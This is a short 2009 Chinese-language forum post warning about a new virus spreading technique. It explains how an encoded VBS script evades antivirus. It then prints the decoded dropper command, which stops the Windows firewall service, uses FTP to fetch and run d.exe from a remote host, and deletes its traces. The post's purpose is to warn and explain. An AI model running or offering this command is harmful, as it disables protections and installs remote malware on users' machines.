» 遊客:  加入 | 登入 (帳號有問題請連絡TWed2k@gmail.com)


 


 TWed2k » 文字海洋 » [分享]新型態的病毒傳播方式! RSS   



  可打印版本 | 推薦給朋友 | 訂閱主題 | 收藏主題 | 純文字版  


 

 
主題: [其他] [分享]新型態的病毒傳播方式!   字型大小:||| 
watchme
銀驢友〔高級〕
等級: 14等級: 14等級: 14等級: 14
無我

十週年紀念徽章(五級)  

今日心情

 . 積分: 926
 . 文章: 2172
 . 收花: 8002 支
 . 送花: 3872 支
 . 比例: 0.48
 . 在線: 3516 小時
 . 瀏覽: 31393 頁
 . 註冊: 7458
 . 失蹤: 0
 . TWed2k-DVD幫
#1 : 2009-11-17 10:02 AM     全部回覆 送鮮花給本文章,以表示喜愛之意,點花數可看送花者名單送花 (3) 引言回覆
最後那個 VBs 是一次編碼的方式包裝惡意程式,主要目的就是為了躲避防毒防木馬軟體的偵測。陣列中的值各減去 823 之後組成一個新的 Script 給 W.Shell 執行 (0x0D 0x63  ),也許還有另外一層,也許沒有。總之,會這樣畏縮的程式,絕不是好東西。

CODE:
cmd /c net stop sharedaccess&echo o tftft.net>n.txt&echo aa33>>n.txt&echo bb33>>n.txt&echo recv d d.exe>>n.txt&echo bye>>n.txt&ftp -s:n.txt&del n.txt&d.exe&attrib ?.vbs -r&del ? ?.exe ?.vbs ?.bat&start http://buy.yahoo.com.tw/


[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  新增/修改 爬文標記

   



 



所在時區為 GMT+8, 現在時間是 2024-11-29 08:36 PM		 清除 Cookies - 連絡我們 - TWed2k © 2001-2046 - 純文字版 - 說明
Discuz! 0.1 | Processed in 0.018242 second(s), 7 queries , Qzip disabled